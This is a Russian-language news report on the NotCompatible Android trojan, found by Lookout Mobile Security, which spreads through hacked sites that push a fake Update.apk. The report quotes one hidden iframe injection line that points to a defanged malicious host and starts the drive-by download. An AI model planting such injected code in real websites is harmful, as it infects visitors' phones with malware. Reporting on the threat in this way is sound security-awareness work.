Смартфоны на базе Android атаковал новый страшный вирус
Эксперты из компании Lookout Mobile Security нашли серьезную троянскую программу для Android, которая распространяется через взломанные интернет-ресурсы, сообщают «Новости Америки».
Программа получила название NotCompatible. Ее создатели взламывают сайты и помещают в их код элемент iframe со ссылкой на троян. Сообщается, что NotCompatible выдает себя за обновление для Android. Заражение происходит в том случае, если пользователь не только загрузил файл, но и установил программу на устройство.
Программа распространялась путем добавления в код взломанных ресурсов специальной ссылки iframe на вредоносный файл. При открытии взломанного сайта, через браузер ОС Android, автоматически начинал загружаться файл Update.apk
По окончании загрузки на экране устройства отображается окно, в котором пользователь должен подтвердить установку приложения. Также для установки приложения на устройстве должна быть включена настройка «Unknown sources». В случае если эта опция отключена, загрузка будет автоматически заблокирована, добавляет Securitylab.
Контролируемые или скомпрометированные злоумышленниками сайты содержат в себе такой код:
<iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-33713371337}”></iframe>
Сайт с таким Iframe отображает ложное сообщение о том, что для просмотра содержимого необходимо осуществить установку дополнительного ПО. При этом загрузка программы осуществляется не с официального магазина Google Play.
Разработчики вируса сделали такую схему только для устройств на базе Android, на других операционных системах или же на ОС стационарных ПК такая схема не работает, то есть загрузка вредоносного файла не осуществляется, уточняет Presscenter.ru.
В блоге Lookout Mobile Security пишут, что пока программа не выполняет вредоносных операций. Тем не менее, есть риск, что создатели NotCompatible доработают вредоносную программу и будут использовать ее для вторжения в частные сети путем преобразования зараженного устройства в прокси-сервер.
На данный момент количество сайтов, содержащих вредоносный код, небольшая и они не отличаются высокой посещаемостью. Lookout Mobile Security отмечает, что случай с NotCompatible стал одним из первых, когда сломанные сайты используются для распространения трояна для мобильных устройств. Обычно к такой схеме прибегают создатели вредоносных программ для PC.